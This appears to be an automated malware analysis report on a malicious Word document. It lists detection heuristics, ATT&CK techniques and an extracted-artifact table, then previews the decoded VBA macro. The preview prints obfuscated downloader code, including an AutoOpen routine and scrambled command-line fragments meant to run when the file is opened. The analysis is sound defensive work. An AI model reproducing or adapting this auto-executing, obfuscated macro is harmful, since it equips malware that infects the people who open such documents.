MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Word document containing a VBA macro. The macro uses a Shell() call, indicating an attempt to execute external code. The ClamAV detection name 'Doc.Downloader.Valyria-6922931-0' strongly suggests the document's purpose is to download and execute a secondary payload. The presence of an AutoOpen macro further supports this, as it is designed to run automatically when the document is opened.
Heuristics 6
-
ClamAV: Doc.Downloader.Valyria-6922931-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Valyria-6922931-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 59691 bytes |
SHA-256: 0e11a8c4c95d405f815ecee4cfdfbc2ce250c05a492d7749fd55783e72cde784 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "BHFnlYzH"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Dim UwoVZ(2)
UwoVZ(0) = Mid(zQWAOYFA + siXoOzmNRizdPAqHAzzErjf + rdArKpM, 33, 336) + MidB(wCIqT + nGzYPtkssajmHVF + noCzYutI, 954, 834)
UwoVZ(1) = Mid(bhsGfTN + ZwTblKWMmlDZPzEAOkmAkq + qfcCrW, 856, 254) + Mid(XnkWwCF + CStCiTsNnvjlhmSjtjjCH + MlrnjvM, 180, 45) + Mid(dzizrfav + GzqQkViVPlhBoZDAX + iiCVBup, 27, 538) + Right(pGnAXz + JjoLvvaDFWvcLbPPTkLUn + LBTnB, 66)
Dim vrGmm(1)
vrGmm(0) = Left(OntMHAFu + PNIEqhfkXDulhlOHsi + CYKzHL, 248) + Mid(VRJKhDF + HCrpTVbZOrmJzFffP + XtVZAS, 505, 996) + Right(fTXCY + phjlwvLjwNcXZmiwUuVAB + hGqKIYs, 518) + Mid(tjYGZNQ + XLjSUXasKThiFoVYpp + jfGCGsvh, 90, 622)
Dim SwtXHZ(1)
SwtXHZ(0) = MidB(lvFQs + YsJkHzzAljjZETVnsd + GpsiZYi, 181, 372) + Right(uvrSSr + smXpBbWluFmCCIDPYnRbQ + fUMAD, 920)
Dim aAwIXV(1)
aAwIXV(0) = MidB(uVRGYRWE + wwVwISpUQGJAoXfGDF + EotOnjA, 424, 832) + Mid(GjIdr + iBNolkFktrHaKQI + PFTuP, 409, 70)
Dim qnQUWu(1)
qnQUWu(0) = Right(wTEHqwc + EEzRzzwqVijvEiNrtA + vEWHmw, 134) + Left(nrPCI + oNVjYwvwJCMkkjSDMdrQAj + tISswCX, 65)
Dim funcz(2)
funcz(0) = Right(ZPDlih + itcCfrVcbqcZQEJoE + WNkGl, 16) + Left(YhFLPWs + snYKBGumqmhVtbWPRZ + QzCIXWDD, 458) + MidB(wQatVG + iKSvDoDozdjwIKwz + CmPiHz, 592, 651) + MidB(IbEJj + wUMTOuTrsTWJTEcYD + rfVGzUIR, 900, 312)
funcz(1) = Left(zdKwn + KPFLPzzHAhIvnhzIHaLa + IbWfJ, 142) + Right(iGhmUGHR + QNHOTAczfauzoGXJTz + SMjVqMrB, 803) + Right(JjvuI + jIIPoHsNzjIBDXCmcJQHik + iYLLOknQ, 712) + Right(XZcMz + hDGmOGWwWQAdizGBnUXN + kmiNAzQ, 308)
vkBqlIWzUP (KeyString(wiArGDh + NuTsmo + 8 + 19 + 40 + cwzaK + zwBfkrJ) + YKVuW + GUNCIj + KeyString(XcwTauE + NuKBCMW + 9 + 22 + 46 + JUcTdhU + FzFiNKUH) + qAWwzR + zHZbdWlfvi + zMRpXq + IarNBSfRBfd + fbKfSD + isJFTso + kGYXHNGw)
Dim dAkjWr(1)
dAkjWr(0) = MidB(WLBhQ + ERRYGFjQzHumSiUsYStQAj + kifdbjz, 552, 631) + Right(Mkzjwj + hlnqJtvhKAQsOXvWjOpp + fbjbizjl, 688)
Dim JpTziU(1)
JpTziU(0) = MidB(vYAkR + jWwwUbwmBdOGFSMPtwOsf + jsszA, 800, 936) + MidB(rJBjVa + wAFHDIhYBiQUdQrqDnBo + huhQctSE, 652, 889) + MidB(wjjLRcn + EOsqUikpzMoKWOARPMmjl + LGsWYA, 55, 63) + Right(oaIPiOo + qnKVLzfzjRiHJizXYMl + hLrmthwz, 731)
End Sub
Attribute VB_Name = "zrWjfzTRjPVwNC"
Function qAWwzR()
Dim BNFaXO(2)
BNFaXO(0) = MidB(vBnfZN + suiXTNRBidzbLPSUhnMQp + EmVqKa, 949, 972) + Mid(oZZMGONZ + pjFsQGjrfdoaDJKUCAdREG + HbYzrqia, 387, 648)
BNFaXO(1) = Right(EhNGOOz + DbRDFwMSAmaNSjmwr + wUkQVmWC, 818) + Mid(WEzGvltV + hqAqvoibBHfzSpba + JfjqhI, 230, 711)
uNrqoXzd = "d \/ \/ /\\\ \ /" + " \ /V:ON/C" + """" + "set \" + "?,`=0a72 a072 02a" + "7 270a 720a 7" + "0a2 02a7 270a 07" + "2a a702 a720 0"
Dim RZkZf(1)
RZkZf(0) = Right(kOVPmRb + WndumrCHnVFKfkXbcRCZ + GNoBz, 572) + MidB(CwSzClc + RrTXajsCuznkUNfbCBIJC + jLjhm, 981, 877)
Dim OnPik(2)
OnPik(0) = Mid(hiUOFi + UJcwSuYlLQAOwcwmfaQTi + tHvvZ, 12, 247) + MidB(CIEmapCr + YKkGXnwwPEqQBRpclP + IZoXKL, 797, 467) + Left(OsrIB + PDOcjOYVZYhDknbj + zlIrfq, 597) + Mid(tQRUWM + ZMazomQLSLHDhrPSGkEWj + jIvtKrKs, 46, 381)
OnPik(1) = Mid(LzrfVX + VMvbcGtKVqrOrPQITz + AhbESOF, 663, 988) + MidB(aTMUQ + rihdQBTtQFOAiLhBCbEEmrc + lvuzEV, 103, 547)
Dim ivmjiw(2)
ivmjiw(0) = MidB(jTzRdElR + fjJhRSChzUtBkfR + wGjLajYq, 52, 123) + MidB(hzNCbA + NbPXccSPtZTRZzzHi + AawEaDf, 982, 163)
ivmjiw(1) = MidB(OmVqJjwR + IhfwbsodtwHmYXBOYQlu + TjiqO, 176, 330) + Right(rtTGw + wilrHzuCLwCwJXmIJFMPkiw + uERDEhU, 129)
zCpwUOb = "72a 27a0 270a 07" + "a2 027a a207 a027" + "}20a7}07a2{a702h" + "a270c0a27ta702a"
GOkQNtdssbn = "07a2ca702}70a2;07a2k" + "7a02a2a07e072ara02" + "7b270a;a270K07a2"
bwSWiwv = "ja270j072a$027a 072a" + "m0a27e270at270aI20a" + "7-27a0e720ak70a2o0a7" + "2v270an2a70I" + "027a;0a72)072aK027aj"
Dim TojFDN(1)
TojFDN(0) = Mid(rTGTK + mkPBMOKHjuPpQiLzoV + LXQlt, 308, 765) + MidB(MDujq + mEiYYIUzBDcILNdDiwXU + vnfuUG, 492, 447)
Dim
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.